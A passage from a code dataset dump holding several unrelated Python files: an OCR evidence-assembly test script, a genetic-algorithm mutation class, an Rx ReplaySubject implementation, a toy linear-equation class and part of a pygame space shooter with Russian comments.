\"_H\"\n text_patch_list.append(text_patch_key)\n patches = []\n if not is_scanned_image:\n for patch in page.extract_words():\n x0, x1, top, bottom = (round(float(patch[k]) * factor) for k in\n ('x0', 'x1', 'top', 'bottom'))\n patches.append([[top, x0, bottom, x1], patch['text']])\n\n if len(patches) == 0:\n text_patch_list = get_text_patch_from_image(image)\n\n result_dict['page_' + str(e)] = {\n 'words': patches,\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n except OverflowError as err:\n text_patch_list = get_text_patch_from_image(image)\n result_dict['page_' + str(e)] = {\n 'words': [],\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n else:\n im = Image.open(io.BytesIO(binary_input))\n image = np.asarray(im)\n text_patch_list = get_text_patch_from_image(image)\n result_dict['page_0'] = {\n 'words': [],\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n\n return result_dict, document_name\n\n\ndef fetch_image_lines(image: np.ndarray):\n lines = cvutils.detect_lines(image)\n lines_dict = {\"horizontal_lines\": [], \"vertical_lines\": []}\n for line in lines:\n if (line[1] - line[3]) < (line[2] - line[0]):\n lines_dict[\"horizontal_lines\"].append([line[3], line[0], line[1], line[2]])\n else:\n lines_dict[\"vertical_lines\"].append([line[3], line[0], line[1], line[2]])\n return lines_dict\n\n\ndef fetch_image_bordered_tables(image: np.ndarray):\n coor_list = Bordered_Table(image).get_coordinate_list()\n return coor_list\n\n\nimport cv2\nimport imutils\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.rzt_ocr_entity import RZT_OCR\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.word_detector import RZTWordDetector\nimport os\nimport tensorflow as tf\nimport requests\n\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.lstm_prediction_model import PredictionModel as PredictionModel\nfrom IDP_pipeline.ocr.ocr_entities.google_cloud_vision.gv_ocr_entity import Google_Cloud_Vision_OCR\nimport json\nimport glob\n\n\ndef draw_patches_and_write_image(im, text_patch_list, evidences, word_list_key, file_path):\n img_with_patch = deepcopy(im)\n for text_patch_key in text_patch_list:\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n\n for evidence_word in evidences[text_patch_key][word_list_key]:\n print(\"evidence word\", evidence_word)\n word = evidence_word[0]\n word_ = [word[0] + t[1], word[1] + t[0], word[2] + t[1], word[3] + t[0]]\n cv2.rectangle(img_with_patch, (t[0], t[1]), (t[2], t[3]), (255, 0, 0), 2)\n # cv2.rectangle(img_with_patch, (word_[1], word_[0]), (word_[3], word_[2]), (0, 0, 255), 2)\n cv2.imwrite(file_path, img_with_patch)\n\n\nif __name__ == \"__main__\":\n\n rules = json.load(open(rule_json))\n\n os.environ['CUDA_VISIBLE_DEVICES'] = str(0)\n config_sess = tf.ConfigProto()\n config_sess.gpu_options.per_process_gpu_memory_fraction = 0.2\n session = tf.InteractiveSession(config=config_sess)\n prediction_model = PredictionModel(\n model_dir=None,\n session=session)\n\n # site = 'http://192.168.60.45:5000'\n # filepath = \"/Users/sunilkumar/ocr/al_data/docs1/RW00275473_2017-12-01.pdf\"\n\n evidence_folder = root_folder + \"evidence/\"\n assembled_image_folder = root_folder + \"assembled_image/\"\n predicted_text_folder = root_folder + \"predicted_text/\"\n rzt_image_folder = root_folder + \"rzt_image/\"\n tesseract_image_folder = root_folder + \"tesseract_image/\"\n gv_image_folder = root_folder + \"gv_image/\"\n text_image_folder = root_folder + \"text_image_folder/\"\n fields_json_folder = root_folder + \"fields_json/\"\n fields_image_folder = root_folder + \"fields_image/\"\n\n if not os.path.isdir(fields_json_folder):\n os.mkdir(fields_json_folder)\n\n if not os.path.isdir(predicted_text_folder):\n os.mkdir(predicted_text_folder)\n\n if not os.path.isdir(fields_image_folder):\n os.mkdir(fields_image_folder)\n\n if not os.path.isdir(assembled_image_folder):\n os.mkdir(assembled_image_folder)\n\n if not os.path.isdir(tesseract_image_folder):\n os.mkdir(tesseract_image_folder)\n\n if not os.path.isdir(gv_image_folder):\n os.mkdir(gv_image_folder)\n\n if not os.path.isdir(rzt_image_folder):\n os.mkdir(rzt_image_folder)\n\n if not os.path.isdir(evidence_folder):\n os.mkdir(evidence_folder)\n\n if not os.path.isdir(text_image_folder):\n os.mkdir(text_image_folder)\n\n for filepath in glob.glob(image_folder + \"*\"):\n # for filepath in glob.glob(\"/Users/sunilkumar/ocr/Table_Data/highpeak/*.pdf\"):\n\n with open(filepath, \"rb\") as binfile:\n pdf_words, document_name = fetch_words(binfile.read(), filepath)\n\n print(\"Fetched words\", filepath, document_name)\n\n for page_key, val in pdf_words.items():\n page_file = document_name + \"_\" + page_key + \".json\"\n print(document_name, page_key)\n im = val[\"numpy_image\"]\n\n if not run_evidence and os.path.isfile(evidence_folder + page_file):\n print(\"Loading evidence from \", evidence_folder + page_file)\n with open(evidence_folder + page_file, \"r\") as evfile:\n assembled_evidence = json.load(evfile)\n else:\n print(\"Running evidence\")\n text_im = deepcopy(im)\n evidence_list = []\n text_patch_list = val[\"text_images\"]\n if \"rzt_ocr\" in required_evidences:\n rzt_evidences = {}\n for text_patch_key in text_patch_list:\n print(text_patch_key)\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n color_ = (0, 0, 255)\n if orientation == \"V\":\n color_ = (255, 0, 0)\n cv2.rectangle(text_im, (t[0], t[1]), (t[2], t[3]), color_, 2)\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if cvutils.is_inverted_text_patch(image_bin):\n tp = (255 - tp).astype(np.uint8)\n\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n\n rzt_evidence = RZT_OCR(image=tp.copy(), lstm_model=prediction_model,\n word_detector=RZTWordDetector.get_words_using_word_space_cluster).get_word_coordinates_with_string()\n print(rzt_evidence)\n\n rzt_evidences[text_patch_key] = rzt_evidence\n # draw and write rzt images\n image_file = rzt_image_folder + document_name + \"_\" + page_key + \".jpg\"\n draw_patches_and_write_image(im, text_patch_list, rzt_evidences, \"word_list\", image_file)\n evidence_list.append(rzt_evidences)\n\n cv2.imwrite(text_image_folder + document_name + \"_\" + page_key + \".jpg\", text_im)\n\n if \"tesseract\" in required_evidences:\n tesseract_evidences = {}\n for text_patch_key in text_patch_list:\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if cvutils.is_inverted_text_patch(image_bin):\n tp = (255 - tp).astype(np.uint8)\n\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n\n # _, img_encoded = cv2.imencode('.jpg', tp)\n # response = requests.post(site + '/tesseract_evidence', data=img_encoded.tostring())\n # tesseract_json = response.json()\n\n tesseract_json = tesseract_evidence(tp)\n\n tesseract_evidences[text_patch_key] = {\n \"tesseract_words\": tesseract_json[\"tesseract_content\"]}\n evidence_list.append(tesseract_evidences)\n if \"google_cloud_vision\" in required_evidences:\n gv_evidences = {}\n for text_patch_key in text_patch_list:\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if cvutils.is_inverted_text_patch(image_bin):\n tp = (255 - tp).astype(np.uint8)\n\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n # cv2.imwrite(\"/Users/sunilkumar/ocr/al_data/text_patches_r/\" + text_patch_key + \".jpg\",tp)\n\n gv_evidence = Google_Cloud_Vision_OCR(image=tp).get_word_coordinate_with_string()\n\n gv_evidences[text_patch_key] = gv_evidence\n evidence_list.append(gv_evidences)\n\n assembled_evidence = assemble_evidences(im, evidence_list, val[\"words\"], text_patch_list,\n required_evidences)\n\n # assembled_evidence[\"lines\"] = fetch_image_lines(im)\n # assembled_evidence[\"tables\"] = fetch_image_bordered_tables(im)\n print(page_key, assembled_evidence)\n fields = hypothesis(evidence=assembled_evidence, image=im, rules=rules)\n field_im = deepcopy(im)\n\n for page_result in fields:\n for field in page_result:\n print(field)\n cv2.rectangle(field_im, field[0][0], field[0][1], (0, 0, 255), 2)\n cv2.imwrite(fields_image_folder + document_name + \"_\" + page_key + \".jpg\", field_im)\n\n with open(fields_json_folder + document_name + \"_\" + page_key + \".json\", \"w\") as evfile:\n json.dump(fields, evfile)\n\n color_ = (255, 0, 0)\n thickness = 1\n with open(evidence_folder + page_file, \"w\") as evfile:\n json.dump(assembled_evidence, evfile)\n word_patch_with_string = dict()\n for word_key, word in assembled_evidence[\"evidence_words\"].items():\n color_ = (255, 0, 0)\n if word[\"true_pdf\"] == 1:\n color_ = (255, 0, 0)\n else:\n color_ = (0, 0, 255)\n\n thickness = 1\n # if word[\"stroke_width\"] > 2.9:\n # thickness= 3\n\n w = word[\"assembled_result\"][0]\n word_patch_with_string[tuple(w)] = word[\"assembled_result\"][1]\n cv2.rectangle(im, (w[1], w[0]), (w[3], w[2]), color_, thickness)\n cv2.imwrite(assembled_image_folder + document_name + \"_\" + page_key + \".jpg\", im)\n image_with_text = write_text_on_image(deepcopy(im), word_patch_with_string)\n cv2.imwrite(predicted_text_folder + document_name + \"_\" + page_key + \".jpg\", image_with_text)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":21237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"341920844","text":"# -*- coding: UTF-8 -*-\n# @Time : 2019/1/26 12:47 PM\n# @File : mutation.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport numpy as np\nimport random\n\n\nclass Mutation(object):\n def __init__(self, mutation_type, multi_points, adaptive=True, **kwargs):\n self.adaptive = adaptive\n self.mutation_type = mutation_type\n self.multi_points = multi_points # -1: auto (simulated annealing)\n self.generation = kwargs.get('generation', 0)\n self.max_generation = kwargs.get('max_generation', 1)\n self.k0 = kwargs.get('k0', 0.1)\n self.k1 = kwargs.get('k1', 1.0)\n\n def _mutate_based_matrices(self, *args, **kwargs):\n # fitness_values: [(index, fitness, gene, rate), (index, fitness, gene, rate), ...]\n fitness_values = kwargs['fitness_values']\n op_region = kwargs['op_region'] # (start, end)\n connection_region = kwargs['connection_region']\n\n N = len(fitness_values)\n M = fitness_values[0][2].shape[-1]\n\n C = np.zeros((N, 1)) # fitness cumulative probability of chromosome i,\n # can be considered as an information measure of chromosome i\n ordered_fitness = [(f[0], f[1]) for f in fitness_values]\n ordered_fitness = sorted(ordered_fitness, key=lambda x: x[1])\n ordered_fitness_values = np.array([m[1] for m in ordered_fitness])\n probability_fitness = ordered_fitness_values / np.sum(ordered_fitness_values)\n\n gamma = 1\n if self.adaptive:\n gamma = np.exp(float(self.generation)/float(self.max_generation * self.k0) - self.k1)\n\n probability_fitness = np.power(probability_fitness, gamma)\n probability_fitness = probability_fitness / np.sum(probability_fitness)\n\n c_sum = 0.0\n for a, b in zip(ordered_fitness, probability_fitness):\n index = a[0]\n c_sum += b\n C[index, 0] = c_sum\n\n # which individual should mutation\n alpha = 1.0 - C # the probability to choose which individual for mutation\n\n A = np.zeros((N, M))\n\n for n in range(N):\n A[n, :] = fitness_values[n][2]\n\n # which position in chromosome i should mutation\n sigma = np.sum(np.power(A - np.mean(A, 0), 2.0) * C, 0) / np.sum(C)\n\n mutation_result = []\n for f in fitness_values:\n # all individual should participate mutation process\n # mutation points number\n multi_points = self.multi_points if self.multi_points > 0 else int(alpha[f[0]] * M)\n\n # op region mutation\n op_multi_points = np.minimum(multi_points, op_region[1] - op_region[0])\n op_sigma = sigma[op_region[0]:op_region[1]]\n op_sigma = op_sigma / (np.sum(op_sigma) + 0.000000001)\n op_sigma = np.power(op_sigma, gamma)\n op_sigma = op_sigma / (np.sum(op_sigma) + 0.000000001)\n\n op_mutation_position = np.random.choice(list(range(op_region[1]-op_region[0])),\n op_multi_points,\n False,\n op_sigma)\n op_mutation_position = np.arange(op_region[0],op_region[1])[op_mutation_position].tolist()\n\n # connection region mutation\n connection_multi_points = np.minimum(multi_points, connection_region[1] - connection_region[0])\n connection_sigma = sigma[connection_region[0]:connection_region[1]]\n connection_sigma = connection_sigma / (np.sum(connection_sigma) + 0.000000001)\n connection_sigma = np.power(connection_sigma, gamma)\n connection_sigma = connection_sigma / (np.sum(connection_sigma) + 0.000000001)\n\n connection_mutation_position = np.random.choice(list(range(connection_region[1]-connection_region[0])),\n connection_multi_points,\n False,\n connection_sigma)\n connection_mutation_position = np.arange(connection_region[0],connection_region[1])[connection_mutation_position].tolist()\n mutation_result.append(f + (op_mutation_position+connection_mutation_position,))\n\n return mutation_result\n\n def _mutate_simple(self, *args, **kwargs):\n # fitness_values: [(index, fitness, gene, rate), (index, fitness, gene, rate), ...]\n fitness_values = kwargs['fitness_values']\n mutation_rate = kwargs['mutation_rate']\n gene_length = fitness_values[0][2].shape[-1]\n\n mutate_result = []\n for individual in fitness_values:\n if random.random() < mutation_rate:\n mutate_result.append(individual + (None,))\n else:\n mutation_position = random.choice(list(range(gene_length)))\n mutate_result.append((individual + (mutation_position,)))\n\n return mutate_result\n\n def adaptive_mutate(self, *args, **kwargs):\n if self.mutation_type.lower() == 'simple':\n return self._mutate_simple(*args, **kwargs)\n elif self.mutation_type.lower() == 'based_matrices':\n return self._mutate_based_matrices(*args, **kwargs)\n\n return None\n\n# mm = EvMutation('simple', -1, True, generation=10, max_generation=100, k0=0.1, k1=1.0)\n#\n# fitness_values = []\n#\n# for index in range(20):\n# fitness = random.random() * 10\n# gene = np.random.rand((10))\n# rate = random.random()\n# fitness_values.append((index, fitness, gene, rate))\n#\n# result = mm.mutate(fitness_values=fitness_values, mutation_rate=0.5)\n","sub_path":"antgo/automl/suggestion/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"489977008","text":"from typing import Iterable, Set, List\n\nfrom rx import config\nfrom rx.concurrency.schedulerbase import SchedulerBase\nfrom rx.core import Disposable\n\nfrom rxbackpressure.ack import Continue, Stop\nfrom rxbackpressure.observers.connectablesubscriber import ConnectableSubscriber\nfrom rxbackpressure.observables.iteratorasobservable import IteratorAsObservable\nfrom rxbackpressure.observable import Observable\nfrom rxbackpressure.observer import Observer\nfrom rxbackpressure.internal.promisecounter import PromiseCounter\nfrom rxbackpressure.scheduler import SchedulerBase\nfrom rxbackpressure.schedulers.currentthreadscheduler import CurrentThreadScheduler\n\n\nclass ReplaySubject(Observable, Observer):\n class State:\n def __init__(self,\n buffer: List,\n capacity: int,\n subscribers: Set = set(),\n length : int = 0,\n is_done: bool = False,\n error_thrown: Exception = None):\n self.buffer = buffer\n self.capacity = capacity\n self.subscribers = subscribers\n self.length = length\n self.is_done = is_done\n self.error_thrown = error_thrown\n\n def copy(self, buffer=None, length=None, subscribers=None):\n return ReplaySubject.State(buffer=buffer if buffer is not None else self.buffer,\n capacity=self.capacity,\n subscribers=subscribers if subscribers is not None else self.subscribers,\n length=length if length is not None else self.length,\n is_done=self.is_done,\n error_thrown=self.error_thrown)\n\n def append_elem(self, elem) -> 'ReplaySubject.State':\n if self.capacity == 0:\n return self.copy(buffer = self.buffer + [elem])\n elif self.length >= self.capacity:\n raise NotImplementedError\n else:\n return self.copy(buffer=self.buffer + [elem], length=self.length+1)\n\n def add_new_subscriber(self, s):\n subscribers = self.subscribers.copy()\n subscribers = subscribers | {s}\n\n new_state = self.copy(subscribers=subscribers)\n return new_state\n\n def remove_subscriber(self, to_remove):\n subscribers = self.subscribers.copy()\n if to_remove in subscribers: # todo: remove this\n subscribers.remove(to_remove)\n\n return self.copy(subscribers=subscribers)\n\n def mark_done(self, ex: Exception):\n return ReplaySubject.State(buffer=self.buffer, capacity=self.capacity, subscribers=set(),\n length=self.length, is_done=True, error_thrown=ex)\n\n def __init__(self, initial_state: State = None):\n self.state: ReplaySubject.State = initial_state or ReplaySubject.State(buffer=[], capacity=0)\n\n self.lock = config[\"concurrency\"].RLock()\n\n def unsafe_subscribe(self, observer: Observer, scheduler: SchedulerBase, subscribe_scheduler: SchedulerBase):\n \"\"\" Creates a new ConnectableSubscriber for each subscription, pushes the current buffer to the\n ConnectableSubscriber and connects it immediately\n\n \"\"\"\n\n def stream_on_done(buffer: Iterable, error_thrown: Exception = None) -> Disposable:\n class TObserver(Observer):\n\n def on_next(self, v):\n ack = observer.on_next(v)\n return ack\n\n def on_error(self, err):\n observer.on_error(err)\n\n def on_completed(self):\n if error_thrown is not None:\n observer.on_error(error_thrown)\n else:\n observer.on_completed()\n\n\n return IteratorAsObservable(iter(buffer)) \\\n .subscribe(TObserver(), scheduler, CurrentThreadScheduler())\n\n state = self.state\n buffer = state.buffer\n\n if state.is_done:\n return stream_on_done(buffer, state.error_thrown)\n else:\n c = ConnectableSubscriber(observer, scheduler=scheduler)\n with self.lock:\n new_state = self.state.add_new_subscriber(c)\n self.state = new_state\n\n c.push_first_all(buffer)\n ack, disposable = c.connect()\n\n if isinstance(ack, Stop):\n self.remove_subscriber(c)\n elif not isinstance(ack, Continue):\n def on_next(v):\n if isinstance(v, Stop):\n self.remove_subscriber(c)\n ack.subscribe(on_next=on_next)\n\n def _():\n try:\n self.remove_subscriber(c)\n finally:\n disposable.signal_stop()\n return Disposable.create(_)\n\n def on_complete_or_error(self, ex: Exception = None):\n with self.lock:\n state = self.state\n\n if not state.is_done:\n self.state = state.mark_done(ex)\n\n iterator = iter(state.subscribers)\n for obs in iterator:\n if ex is None:\n obs.on_completed()\n else:\n obs.on_error(ex)\n\n def remove_subscriber(self, s: ConnectableSubscriber):\n with self.lock:\n # print('remove subscriber')\n state = self.state\n new_state = state.remove_subscriber(s)\n self.state = new_state\n\n def on_next(self, elem):\n with self.lock:\n state = self.state\n if not state.is_done:\n self.state = state.append_elem(elem)\n\n iterator = iter(state.subscribers)\n result = None\n\n for obs in iterator:\n try:\n ack = obs.on_next(elem)\n except:\n raise NotImplementedError\n\n if isinstance(ack, Stop):\n self.remove_subscriber(obs)\n else:\n if result is None:\n result = PromiseCounter(Continue(), 1)\n result.acquire()\n\n def on_next(v):\n if isinstance(v, Continue):\n result.countdown()\n else:\n self.remove_subscriber(obs)\n result.countdown()\n\n ack.observe_on(obs.scheduler).subscribe(on_next)\n\n if result is None:\n return Continue()\n else:\n result.countdown()\n return result.promise\n\n def on_error(self, err):\n self.on_complete_or_error(err)\n\n def on_completed(self):\n self.on_complete_or_error()\n","sub_path":"rxbackpressure/subjects/replaysubject.py","file_name":"replaysubject.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"188976033","text":"class LinearEquation:\n def __init__(self, a, b, c, d, e, f):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n self.e = e\n self.f = f\n\n def linear_equation(self, a: int, b: int, c: int, d: int, e: int, f: int):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n self.e = e\n self.f = f\n\n def isSovable():\n if 12 - 12 == 0:\n return True ","sub_path":"Assignment/Ass2.py","file_name":"Ass2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"457694593","text":"import random\nimport sys\nfrom const import *\nfrom data import images, sounds, load_image\n\nplayer = None # Объект игрока, первоначально не задан\nall_sprites, my_group, lessons_group, fon_group = restart_sprites_for_lessons()\n\n\nclass PlayerLayout(pygame.sprite.Sprite):\n def __init__(self, x, y, layout_group):\n super().__init__(layout_group)\n self.image = images['player']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n\nclass FalconLayout(pygame.sprite.Sprite):\n def __init__(self, x, y, layout_group):\n super().__init__(layout_group)\n self.image = images['falcon']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n\ndef terminate():\n \"\"\"Функция для выхода\"\"\"\n pygame.quit()\n sys.exit()\n\n\ndef draw_start_screen(intro_text, sp, falcon_mode):\n screen.fill((0, 0, 0))\n Fon(-400, -200, fon_group, 1)\n fon_group.draw(screen)\n lay_group = get_sprites_group()\n if falcon_mode:\n FalconLayout(170, 450, lay_group)\n else:\n PlayerLayout(170, 450, lay_group)\n lay_group.draw(screen)\n font = pygame.font.Font(None, 50)\n text_coord = [(140, 70), (150, 200), (80, 260), (150, 320)]\n for line in range(len(intro_text)): # Загрузка текста\n string_rendered = font.render(intro_text[line], 1, pygame.Color('white'))\n intro_rect = string_rendered.get_rect()\n intro_rect.top = text_coord[line][1]\n intro_rect.x = text_coord[line][0]\n sp.append(intro_rect)\n screen.blit(string_rendered, intro_rect)\n return sp[1], sp[2], sp[3]\n\n\ndef start_screen(function_for_choice_mode_screen, falcon_mode):\n \"\"\"Выводит главное меню\"\"\"\n global music\n pygame.mouse.set_visible(True)\n sp = []\n intro_text = [\"PySpace\", 'Играть', 'Выбор корабля', \"Выход\"]\n if music == 0: # Запускаем музыку, если она ещё не играет\n pygame.mixer_music.load(sounds['main_theme'])\n pygame.mixer_music.play(-1)\n pygame.mixer_music.set_volume(0.6)\n music = 1\n play_button, choice_button, exit_button = draw_start_screen(intro_text, sp, falcon_mode)\n while True:\n for event in pygame.event.get(): # Ждём щелчка для показа уровней\n if event.type == pygame.QUIT or (\n event.type == pygame.MOUSEBUTTONDOWN and exit_button.collidepoint(event.pos)):\n terminate() # Выход\n elif event.type == pygame.MOUSEBUTTONDOWN and play_button.collidepoint(event.pos):\n return display_lessons(falcon_mode, function_for_choice_mode_screen)\n elif event.type == pygame.MOUSEBUTTONDOWN and choice_button.collidepoint(event.pos):\n falcon_mode = function_for_choice_mode_screen()\n play_button, choice_button, exit_button = draw_start_screen(intro_text, sp, falcon_mode)\n pygame.display.flip()\n clock.tick(FPS)\n\n\nclass Fon(pygame.sprite.Sprite):\n \"\"\" Класс фонов для игры\"\"\"\n\n def __init__(self, x, y, fon_gr, n, battle=False):\n \"\"\"Для инициализации нужны координаты, номер фона (также как для уровней) n,\n указание фон для битвы или нет batle\"\"\"\n super().__init__(all_sprites, fon_gr)\n if not battle:\n self.image = images[f'fon{n}']\n else:\n self.image = images[f'fonb{n}']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.n = 0 # Счётчик\n\n\nclass MySprite(pygame.sprite.Sprite):\n \"\"\"Класс для стрелок\"\"\"\n\n def __init__(self, pov, x, y): # Создаём спрайт\n super().__init__(all_sprites, my_group)\n if not pov: # Смотрим какая стрелка нам нужна\n self.image = images['strelki']\n else:\n self.image = images['sterki1']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def update(self, *args): # Смотрим, есть ли нажатие\n if self.rect.collidepoint(args[0].pos):\n return True\n else:\n return False\n\n\nclass Lesson(pygame.sprite.Sprite):\n \"\"\"Класс для показа значков уровней\n Всего уровней 3\"\"\"\n\n def __init__(self, n): # Создаём значок\n super().__init__(lessons_group, all_sprites)\n self.image = load_image(f'lesson{n}.png', -1)\n self.rect = self.image.get_rect()\n self.rect.x = 160\n self.lesson_number = n\n if n == 1: # Выбираем координату по высоте, которая подходит данному уровню\n self.rect.y = 25\n elif n == 2:\n self.rect.y = 250\n else:\n self.rect.y = 475\n\n def choice_music(self):\n if self.lesson_number == 3: # Выбираем музыку, которая будет играть\n pygame.mixer_music.load(sounds['boss_theme'])\n else:\n pygame.mixer_music.load(sounds['game_theme'])\n pygame.mixer_music.play(-1)\n\n def update(self, event, falcon_mode): # Смотрим на действия пользователя\n if self.rect.collidepoint(event.pos):\n self.choice_music()\n return generate_level(\n f'level{self.lesson_number}.txt'), self.lesson_number, falcon_mode # Возвращаем загруженный уровень\n else:\n return False\n\n\ndef display_lessons(falcon_mode, function_for_choice_mode_screen, lesson_number=None):\n \"\"\"Показываем уровни и запускаем их.\n lesson_number нужно для того чтобы запускать определённый уровень без выбора пользователя.\n Когда пользователь сам заходит, то lesson_number=None\"\"\"\n global music\n pygame.mouse.set_visible(True)\n if lesson_number is None: # Случай, когда пользователь выбирает уровень\n if music == 0: # Запускаем музыку, если она ещё не играет\n pygame.mixer_music.load(sounds['main_theme'])\n pygame.mixer_music.play(-1)\n pygame.mixer_music.set_volume(0.6)\n music = 1\n screen.fill((0, 0, 0))\n Fon(-10, -10, fon_group, 2)\n for i in range(3): # Загружаем значки уровней\n Lesson(i + 1)\n MySprite(True, 0, 0) # Загружаем стрелочку\n while True:\n for event in pygame.event.get(): # Отслеживаем дейс��вия пользователя\n if event.type == pygame.QUIT: # Выход\n terminate()\n if event.type == pygame.MOUSEBUTTONDOWN: # Нажатие на уровень\n for i in lessons_group:\n answer = i.update(event, falcon_mode)\n if answer:\n return answer\n for i in my_group: # Нажатие на стрелку\n if i.update(event):\n return start_screen(function_for_choice_mode_screen, falcon_mode)\n all_sprites.draw(screen)\n pygame.display.flip()\n clock.tick(FPS)\n else: # Случай, когда пользователь нажал на кнопку по переходу на какой-то уровень, проходя уровень\n for i in lessons_group:\n if i.lesson_number == lesson_number:\n i.choice_music()\n pygame.mixer_music.set_volume(0.6)\n music = 0\n return generate_level(f'level{lesson_number}.txt'), lesson_number, falcon_mode\n\n\ndef generate_level(filename): # Собираем уровень\n \"\"\"Уровни изначально заданы только количеством врагов и волн\n Конфигурация собирается в этом уровне по файлу из папки levels\"\"\"\n filename = \"levels/\" + filename # Расположение файла\n sp = []\n with open(filename, mode='r') as map_file: # Открываем файл\n text = map_file.readlines()\n map_width = 9 # Количество возможных координат появления врагов и препятствий\n for i in text[0].strip().split(';'): # Расшифровываем запись\n sp1 = []\n if not i:\n continue\n for j in range(0, len(i) - 1, 2):\n k = i[j]\n typ = i[j + 1] # Определяем тип врага\n if typ == 'm':\n elem = '*'\n else:\n elem = typ\n # m - астероиды\n # n - корабли врагов\n # b - босс\n sp1.extend((k, elem))\n sp.append(sp1) # Получаем список с количеством врагов\n map1 = []\n sp = sp[::-1]\n for i in range(len(sp)): # Формируем список строк с точным расположением врагов и свободных мест\n s = []\n for j in range(0, len(sp[i]) - 1, 2): # Собираем одну строку с всеми врагами в определённое время появления\n k = int(sp[i][j])\n elem = sp[i][j + 1]\n s += k * elem\n if map_width < len(s): # Исключаем возможные ошибки с слишком большим количеством врагов в уровне\n s = s[:map_width]\n print('Слишком много врагов, уровень обрезан')\n if not s.count('b') and not s.count('n'): # Если только метеориты в линии\n s += (map_width - len(s)) * '-' # Добавляем количество свободных мест\n random.shuffle(s) # Перемешиваем, чтобы добавить вариантов\n map1.append(''.join(s))\n elif not s.count('b') and s.count('n'): # Если только корабли в линии\n s = '--n'\n # Добавляем вражеский корабль, не важно где они будут стоять, так как они позиционируются по игроку\n s += (map_width - len(s)) * '-'\n map1.append(''.join(s))\n else: # Если есть босс\n level_width = map_width\n if level_width % 2 != 0: # Ставим босса по середине\n pl_xn = (level_width - 1) // 2\n else:\n pl_xn = level_width // 2\n sp1 = []\n for i1 in range(level_width):\n if i1 != pl_xn:\n sp1.append('-')\n else:\n sp1.append('b')\n map1.append(''.join(sp1))\n if LEVEL_WIDTH % 2 != 0:\n pl_xn = (LEVEL_WIDTH - 1) // 2\n else:\n pl_xn = LEVEL_WIDTH // 2\n sp = []\n for i in range(LEVEL_WIDTH):\n if i != pl_xn:\n sp.append('-')\n else:\n sp.append('P')\n for i in range(5):\n map1.append(''.join(sp).replace('P', '-'))\n map1.append(''.join(sp))\n return map1\n\n\ndef pause_screen(lesson_number):\n \"\"\"Выводит окно для паузы\"\"\"\n global music\n pygame.mouse.set_visible(True)\n answer = None\n sp = []\n k = 0\n intro_text = ['Пауза', \"Продолжить\", \"К уровням\", \"Главное меню\"]\n screen.fill((0, 0, 0))\n Fon(-400, -200, fon_group, lesson_number)\n fon_group.draw(screen)\n font = pygame.font.Font(None, 50)\n text_coord = [(170, 100), (110, 300), (130, 350), (100, 400)]\n for line in range(len(intro_text)): # Загрузка текста\n string_rendered = font.render(intro_text[line], 1, pygame.Color('white'))\n intro_rect = string_rendered.get_rect()\n intro_rect.top = text_coord[line][1]\n intro_rect.x = text_coord[line][0]\n sp.append(intro_rect)\n screen.blit(string_rendered, intro_rect)\n play_button = sp[1]\n lesson_button = sp[2]\n main_menu_button = sp[3]\n while True: # Обработка действий пользователя\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Выход\n terminate()\n elif event.type == pygame.MOUSEBUTTONDOWN: # Нажатие на кнопки\n if lesson_button.collidepoint(event.pos):\n answer = 'les'\n pygame.mixer_music.play(-1)\n music = 0\n if main_menu_button.collidepoint(event.pos):\n answer = 'main'\n pygame.mixer_music.play(-1)\n music = 0\n if play_button.collidepoint(event.pos):\n answer = 'play'\n\n if k % FPS == 0: # Когда прошла секунда, смотрим сделал ли пользователь выбор или нет\n if answer is not None:\n return answer # Если время 